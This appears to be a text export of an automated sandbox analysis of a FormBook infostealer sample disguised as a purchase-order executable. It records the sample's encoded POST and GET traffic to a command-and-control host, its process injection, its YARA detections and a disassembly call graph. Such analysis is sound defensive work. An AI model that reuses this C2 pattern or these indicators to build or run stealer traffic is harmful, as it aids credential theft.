                                                        Data Ascii: 8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0%


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.650019188.114.97.3804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:45:29.415868998 CET765OUTPOST /8rr3/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.cifasnc.info
                                                        Origin: http://www.cifasnc.info
                                                        Cache-Control: max-age=0
                                                        Content-Length: 233
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.cifasnc.info/8rr3/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 67 75 31 2f 6f 44 74 34 2b 50 6f 46 41 78 63 52 37 2b 32 6d 56 5a 68 64 6c 53 7a 4a 73 6e 39 61 54 32 51 38 6e 66 6d 73 36 4b 6b 4a 43 79 69 37 46 61 33 53 70 4c 72 44 42 57 72 70 65 53 76 77 66 6e 6c 71 41 4b 38 58 38 6d 58 2f 50 30 62 57 6e 63 2f 30 56 56 50 70 6f 43 78 4e 36 38 62 6e 41 6e 6f 77 66 70 69 41 38 58 63 31 47 57 6f 66 62 51 72 59 6c 4b 65 38 62 38 4b 4e 75 72 6f 71 65 79 72 50 56 71 4e 65 6d 5a 64 6a 36 39 7a 62 54 35 4d 59 6f 69 6a 68 72 65 77 34 34 37 61 36 4f 46 32 33 6f 46 7a 39 6c 31 74 66 64 6f 77 37 73 4a 5a 2f 43 51 6f 46 4c 65 6a 30 7a 48 4f 48 42 54 4c 75 47 32 72 73 4b 5a 44 39 58 45 57 4b 5a 68 35 52 2b 41 3d 3d
                                                        Data Ascii: fVnx=vLUBlmPRKk2bgu1/oDt4+PoFAxcR7+2mVZhdlSzJsn9aT2Q8nfms6KkJCyi7Fa3SpLrDBWrpeSvwfnlqAK8X8mX/P0bWnc/0VVPpoCxN68bnAnowfpiA8Xc1GWofbQrYlKe8b8KNuroqeyrPVqNemZdj69zbT5MYoijhrew447a6OF23oFz9l1tfdow7sJZ/CQoFLej0zHOHBTLuG2rsKZD9XEWKZh5R+A==
                                                        Jan 16, 2025 00:45:29.941860914 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Wed, 15 Jan 2025 23:45:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        x-pingback: http://cifasnc.info/xmlrpc.php
                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        last-modified: Wed, 15 Jan 2025 23:45:29 GMT
                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        vary: Accept-Encoding,User-Agent
                                                        x-turbo-charged-by: LiteSpeed
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wfen66d5Jiu6XNLqcO2NeHKzgYo573pVgXmCAN%2F9fjUTNLg5hyMA0AJBzZ5CPpqFQ5jnFb4PP7xTuAHXb2ofurwCIgnY9E3UpAhGcdNhr2dwAcmni8RDNdIXy0eBWw1FUdFu"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9029bd610e65d660-IAD
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6994&min_rtt=6994&rtt_var=3497&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 38 13 b7 a0
                                                        Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H8
                                                        Jan 16, 2025 00:45:29.941879988 CET224INData Raw: 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54 68 63 af 79 e5 15
                                                        Data Ascii: DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2
                                                        Jan 16, 2025 00:45:29.941890001 CET929INData Raw: 2c 0f 21 2c bd ed be 9e 04 6d 30 25 15 0a d4 d4 4a 4d a0 cb cd 94 fc 21 75 71 ad d1 18 78 b1 ba 58 bd 08 fe c6 a1 16 17 c9 5a 16 3b c8 39 35 26 25 a8 b5 d4 2f cf 5f ba 5a 2d d8 06 58 91 92 ad a6 4a a1 d3 17 64 6a 77 39 24 5b 9c 0c 12 4e 13 6a 47
                                                        Data Ascii: ,!,m0%JM!uqxXZ;95&%/_Z-XJdjw9$[NjGi5=u$5-E7Hf1QT} e$w##Dl-g6hruRa<"w(jhk!nXE:'0`v7LE>SLE}#H6Don+D 9>qsA,iy


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.650020188.114.97.3804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:45:31.995879889 CET1778OUTPOST /8rr3/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.cifasnc.info
                                                        Origin: http://www.cifasnc.info
                                                        Cache-Control: max-age=0
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.cifasnc.info/8rr3/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 67 75 31 2f 6f 44 74 34 2b 50 6f 46 41 78 63 52 37 2b 32 6d 56 5a 68 64 6c 53 7a 4a 73 6e 31 61 53 48 77 38 6e 34 4b 73 37 4b 6b 4a 42 79 69 2b 46 61 33 44 70 50 2f 48 42 57 58 35 65 51 6e 77 46 45 74 71 49 62 38 58 32 6d 58 2f 44 55 62 58 34 4d 2f 68 56 56 2b 69 6f 43 68 4e 36 38 62 6e 41 6b 67 77 57 63 43 41 2b 58 63 30 42 57 6f 54 66 51 71 33 6c 4b 47 47 62 38 4f 37 75 59 67 71 64 57 33 50 46 50 5a 65 37 4a 64 68 71 74 7a 44 54 35 49 35 6f 69 76 6c 72 64 73 53 34 37 2b 36 50 77 4c 62 37 56 7a 68 34 31 46 6f 4f 59 6c 46 67 64 64 4e 45 78 74 68 4e 2b 6a 38 78 48 48 76 44 55 71 77 54 33 4b 4b 63 34 48 56 65 55 2b 63 61 54 4d 6c 39 38 6b 78 6b 41 2f 58 31 59 61 5a 77 47 56 72 61 33 57 44 66 66 31 68 73 70 52 6f 36 36 74 44 5a 4b 32 48 72 4b 71 57 58 37 41 6c 77 66 53 2f 31 4d 79 6c 61 56 39 77 45 6f 34 4d 59 36 4d 37 74 30 43 48 38 6d 63 66 7a 6b 56 38 2b 6a 55 61 67 6d 73 43 56 64 43 2b 53 52 65 4f 77 2b 52 59 53 56 31 4e 6b 46 44 38 53 39 47 77 55 [TRUNCATED]
                                                        Data Ascii: fVnx=vLUBlmPRKk2bgu1/oDt4+PoFAxcR7+2mVZhdlSzJsn1aSHw8n4Ks7KkJByi+Fa3DpP/HBWX5eQnwFEtqIb8X2mX/DUbX4M/hVV+ioChN68bnAkgwWcCA+Xc0BWoTfQq3lKGGb8O7uYgqdW3PFPZe7JdhqtzDT5I5oivlrdsS47+6PwLb7Vzh41FoOYlFgddNExthN+j8xHHvDUqwT3KKc4HVeU+caTMl98kxkA/X1YaZwGVra3WDff1hspRo66tDZK2HrKqWX7AlwfS/1MylaV9wEo4MY6M7t0CH8mcfzkV8+jUagmsCVdC+SReOw+RYSV1NkFD8S9GwUbXUvNd0U/rFSk8NWhPohZ5jzUyi4MYE2WXOocuZVZFdHc1DQvWKN83OFOebOp05WzB0zFBt3S1z86libai0/YyerdTHeDav91Hs+w+DqoblMniBnmJWSMfZrJ9QMmSaXfgGUPU+CeMWrKajOplYJ11s9Wv4qBZmEZ4eLVR3PvMIk8krDOTcRJAEuupyF7snPLb6ryvLFpOtz6i32fNzxYz0qDlkDlx5on2O1rKVpNrOhpL+kAFEwBCv36tNWt3kg4bSR/Me9MHIuIma3IFMeX/n29lB2AqJhShhr56npzlHTFqeeLxfsj7/57OeJmmRfGFeYdKXwjhOO2HeOlJzvm/9E6dwXPk6IS1oHcTw93XLHQrjIqp1SfVIW8IFihRMA78u6J/u/mJy4HQXiDRdGUxvSJrW6ZfSRx13xhx0qUdWuPtutUfrKG8mGrgbYmGN6N2ntPDFDUPiq+n6R+/PS5TD5GmXjVM7fXcfIxS4OrpKWwXr1KZVnocHzgLmKIXo5FIfgdjivFG2TVQvhYk5nit9vw+xIbBqcKQJqrxsqGv+h8IfY0nq8dC173Bu/vx51cohzHlJm/tuVUQIcpPntSP/CsapP+UcXMR9eRkXTAYnmjx1Dbp7BPVSSUOXTOTP34Uu0RCvKiYhKkwh9JT4p+Nehwf0A3P0z/d [TRUNCATED]
                                                        Jan 16, 2025 00:45:32.595988035 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Wed, 15 Jan 2025 23:45:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        x-pingback: http://cifasnc.info/xmlrpc.php
                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        last-modified: Wed, 15 Jan 2025 23:45:32 GMT
                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        vary: Accept-Encoding,User-Agent
                                                        x-turbo-charged-by: LiteSpeed
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lIxc5puVm%2BoM278R7tfSiIszsVGW6t6EIqKnksjKx%2B6NrxIzeOC7fTu1I3eMRbYmrfmuhu901LCw%2F2FHxEHeWyl%2BI5fCruwIxsAjWjIrVNE3ezdC95JFFu11RsNW%2BEk%2FJhFj"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9029bd717f24062c-IAD
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6838&min_rtt=6838&rtt_var=3419&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1778&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15
                                                        Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#
                                                        Jan 16, 2025 00:45:32.596007109 CET1164INData Raw: 13 a5 4c e2 20 b4 48 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35
                                                        Data Ascii: L H8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.650021188.114.97.3804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:45:35.069148064 CET484OUTGET /8rr3/?fVnx=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH0APXdXeLgJf/YH3s7SsSxcTFbV5TCLi5mGdkJSFjaSfV97iwCLA=&XLc=1bXtqxM HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.cifasnc.info
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Jan 16, 2025 00:45:35.715250015 CET1236INHTTP/1.1 301 Moved Permanently
                                                        Date: Wed, 15 Jan 2025 23:45:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        x-pingback: http://cifasnc.info/xmlrpc.php
                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        last-modified: Wed, 15 Jan 2025 23:45:35 GMT
                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        location: http://cifasnc.info/8rr3/?fVnx=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH0APXdXeLgJf/YH3s7SsSxcTFbV5TCLi5mGdkJSFjaSfV97iwCLA=&XLc=1bXtqxM
                                                        vary: User-Agent
                                                        x-turbo-charged-by: LiteSpeed
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IsmIhOKTrNrhO2XjKSN0HptUZGpP1GD%2FkTTEoTmAjB96Sio7ZwnS%2B8qjtAlBSUy8iXONAns%2BIjLI46jXlZcnI6OFbQmfli7KLs8ZOkO2fjx98%2FsOdsh5CWy4fjO6B317KEjw"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9029bd8529d8ac52-YYZ
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=27807&min_rtt=27807&rtt_var=13903&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 30
                                                        Data Ascii: 0
                                                        Jan 16, 2025 00:45:35.715286016 CET4INData Raw: 0d 0a 0d 0a
                                                        Data Ascii:


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:18:42:30
                                                        Start date:15/01/2025
                                                        Path:C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exe"
                                                        Imagebase:0xb80000
                                                        File size:289'280 bytes
                                                        MD5 hash:6BA617537993E9D6E9CAC767EC890371
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2514153337.0000000001480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2515425897.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:18:43:02
                                                        Start date:15/01/2025
                                                        Path:C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe"
                                                        Imagebase:0x5e0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3982653238.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:6
                                                        Start time:18:43:03
                                                        Start date:15/01/2025
                                                        Path:C:\Windows\SysWOW64\fc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                        Imagebase:0x390000
                                                        File size:22'528 bytes
                                                        MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3982308756.0000000002970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3981444613.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3982249648.0000000002920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:8
                                                        Start time:18:43:18
                                                        Start date:15/01/2025
                                                        Path:C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe"
                                                        Imagebase:0x5e0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3985173271.0000000004A80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:9
                                                        Start time:18:43:30
                                                        Start date:15/01/2025
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff728280000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:1.2%
                                                          Dynamic/Decrypted Code Coverage:5.2%
                                                          Signature Coverage:14.1%
                                                          Total number of Nodes:135
                                                          Total number of Limit Nodes:10
                                                          execution_graph 92205 b99258 92208 bacb43 92205->92208 92207 b99262 92209 bacb60 92208->92209 92210 bacb71 NtClose 92209->92210 92210->92207 92233 b81beb 92234 b81bf9 92233->92234 92237 bb0173 92234->92237 92240 bae7b3 92237->92240 92241 bae7d9 92240->92241 92252 b87583 92241->92252 92243 bae7ef 92251 b81d8c 92243->92251 92255 b9b5d3 92243->92255 92245 bae80e 92248 bae823 92245->92248 92270 bacf03 92245->92270 92266 ba86d3 92248->92266 92249 bae83d 92250 bacf03 ExitProcess 92249->92250 92250->92251 92273 b96953 92252->92273 92254 b87590 92254->92243 92256 b9b5ff 92255->92256 92297 b9b4c3 92256->92297 92259 b9b62c 92261 b9b637 92259->92261 92263 bacb43 NtClose 92259->92263 92260 b9b644 92262 b9b660 92260->92262 92264 bacb43 NtClose 92260->92264 92261->92245 92262->92245 92263->92261 92265 b9b656 92264->92265 92265->92245 92267 ba8735 92266->92267 92269 ba8742 92267->92269 92308 b98b13 92267->92308 92269->92249 92271 bacf1d 92270->92271 92272 bacf2a ExitProcess 92271->92272 92272->92248 92274 b96970 92273->92274 92276 b96989 92274->92276 92277 bad583 92274->92277 92276->92254 92279 bad59d 92277->92279 92278 bad5cc 92278->92276 92279->92278 92284 bac193 92279->92284 92285 bac1b0 92284->92285 92291 1582c0a 92285->92291 92286 bac1dc 92288 baec03 92286->92288 92294 baceb3 92288->92294 92290 bad645 92290->92276 92292 1582c1f LdrInitializeThunk 92291->92292 92293 1582c11 92291->92293 92292->92286 92293->92286 92295 bacecd 92294->92295 92296 bacede RtlFreeHeap 92295->92296 92296->92290 92298 b9b4dd 92297->92298 92302 b9b5b9 92297->92302 92303 bac233 92298->92303 92301 bacb43 NtClose 92301->92302 92302->92259 92302->92260 92304 bac250 92303->92304 92307 15835c0 LdrInitializeThunk 92304->92307 92305 b9b5ad 92305->92301 92307->92305 92310 b98b3d 92308->92310 92309 b9903b 92309->92269 92310->92309 92316 b94173 92310->92316 92312 b98c6a 92312->92309 92313 baec03 RtlFreeHeap 92312->92313 92314 b98c82 92313->92314 92314->92309 92315 bacf03 ExitProcess 92314->92315 92315->92309 92320 b94193 92316->92320 92318 b941fc 92318->92312 92319 b941f2 92319->92312 92320->92318 92321 b9b8e3 RtlFreeHeap LdrInitializeThunk 92320->92321 92321->92319 92322 b9402f 92323 b93fa6 92322->92323 92323->92322 92324 b93fb5 92323->92324 92326 bacdd3 92323->92326 92327 bacdf0 92326->92327 92330 1582c70 LdrInitializeThunk 92327->92330 92328 bace18 92328->92324 92330->92328 92331 1582b60 LdrInitializeThunk 92211 ba4e13 92212 ba4e2f 92211->92212 92213 ba4e6b 92212->92213 92214 ba4e57 92212->92214 92216 bacb43 NtClose 92213->92216 92215 bacb43 NtClose 92214->92215 92217 ba4e60 92215->92217 92218 ba4e74 92216->92218 92221 baed23 RtlAllocateHeap 92218->92221 92220 ba4e7f 92221->92220 92332 bafca3 92333 bafcb9 92332->92333 92334 bafcb3 92332->92334 92337 baece3 92333->92337 92336 bafcdf 92340 bace63 92337->92340 92339 baecfe 92339->92336 92341 bace80 92340->92341 92342 bace91 RtlAllocateHeap 92341->92342 92342->92339 92343 ba51a3 92348 ba51bc 92343->92348 92344 ba524c 92345 ba5204 92346 baec03 RtlFreeHeap 92345->92346 92347 ba5214 92346->92347 92348->92344 92348->92345 92349 ba5247 92348->92349 92350 baec03 RtlFreeHeap 92349->92350 92350->92344 92351 bafd03 92352 baec03 RtlFreeHeap 92351->92352 92353 bafd18 92352->92353 92354 bac143 92355 bac15d 92354->92355 92358 1582df0 LdrInitializeThunk 92355->92358 92356 bac185 92358->92356 92222 b944f3 92223 b9450d 92222->92223 92228 b97ca3 92223->92228 92225 b9452b 92226 b94570 92225->92226 92227 b9455f PostThreadMessageW 92225->92227 92227->92226 92230 b97cc7 92228->92230 92229 b97cce 92229->92225 92230->92229 92231 b97d1a 92230->92231 92232 b97d03 LdrLoadDll 92230->92232 92231->92225 92232->92231 92359 b9b7c3 92360 b9b807 92359->92360 92361 b9b828 92360->92361 92362 bacb43 NtClose 92360->92362 92362->92361 92363 b9aa63 92364 b9aad5 92363->92364 92365 b9aa7b 92363->92365 92365->92364 92367 b9e993 92365->92367 92368 b9e9b9 92367->92368 92372 b9eab0 92368->92372 92373 bafd43 RtlAllocateHeap RtlFreeHeap 92368->92373 92370 b9ea4e 92371 bac193 LdrInitializeThunk 92370->92371 92370->92372 92371->92372 92372->92364 92373->92370

                                                          Executed Functions

                                                          Function 00B98B13 Relevance: 2.9, Strings: 2, Instructions: 433COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 41 b98b13-b98b4a call baeca3 44 b98b55-b98b87 call baeca3 call b84b43 call ba47b3 41->44 45 b98b50 call baeca3 41->45 52 b98b8d-b98bb7 call baec53 44->52 53 b99046-b9904a 44->53 45->44 56 b98bb9-b98bc0 52->56 57 b98bc2 52->57 58 b98bc4-b98bce 56->58 57->58 59 b98bef-b98c01 call ba47e3 58->59 60 b98bd0 58->60 66 b99044-b99045 59->66 67 b98c07-b98c1f call bae603 59->67 61 b98bd3-b98bd6 60->61 63 b98bd8-b98bdb 61->63 64 b98bdf-b98be9 61->64 63->61 68 b98bdd 63->68 64->59 66->53 67->66 71 b98c25-b98c75 call b94173 67->71 68->59 71->66 74 b98c7b-b98c9b call baec03 71->74 77 b98c9d-b98c9f 74->77 78 b98ccc-b98cce 74->78 79 b98ca1-b98caf call bae173 call b870c3 77->79 80 b98cd7-b98cf9 call b9b673 77->80 78->80 81 b98cd0 78->81 89 b98cb4-b98cb9 79->89 80->66 86 b98cff-b98d21 call bac363 80->86 81->80 90 b98d26-b98d2b 86->90 89->78 91 b98cbb-b98cca 89->91 90->66 92 b98d31-b98da7 call babd03 call babdb3 call baec53 90->92 91->92 99 b98da9-b98dae 92->99 100 b98db0 92->100 101 b98db2-b98de2 99->101 100->101 102 b98de8-b98dee 101->102 103 b98ebe 101->103 105 b98dfc-b98e1d call baec53 102->105 106 b98df0-b98df3 102->106 104 b98ec0 103->104 109 b98ec7-b98ecb 104->109 113 b98e29 105->113 114 b98e1f-b98e27 105->114 106->102 108 b98df5-b98df7 106->108 108->104 111 b98ecd-b98ecf 109->111 112 b98ed1-b98ed5 109->112 111->112 115 b98ed7-b98eeb 111->115 112->109 116 b98e2c-b98e41 113->116 114->116 117 b98eed-b98ef2 115->117 118 b98f55-b98fa8 call b97c23 * 2 call baec23 115->118 119 b98e43 116->119 120 b98e54-b98e95 call b97ba3 call baec53 116->120 122 b98ef4-b98ef7 117->122 148 b98faa-b98fae 118->148 149 b98fcd-b98fd2 118->149 123 b98e46-b98e49 119->123 143 b98e9e 120->143 144 b98e97-b98e9c 120->144 126 b98ef9-b98efc 122->126 127 b98f0e-b98f10 122->127 129 b98e4b-b98e4e 123->129 130 b98e52 123->130 126->127 133 b98efe-b98f00 126->133 127->122 128 b98f12-b98f14 127->128 128->118 134 b98f16-b98f1e 128->134 129->123 135 b98e50 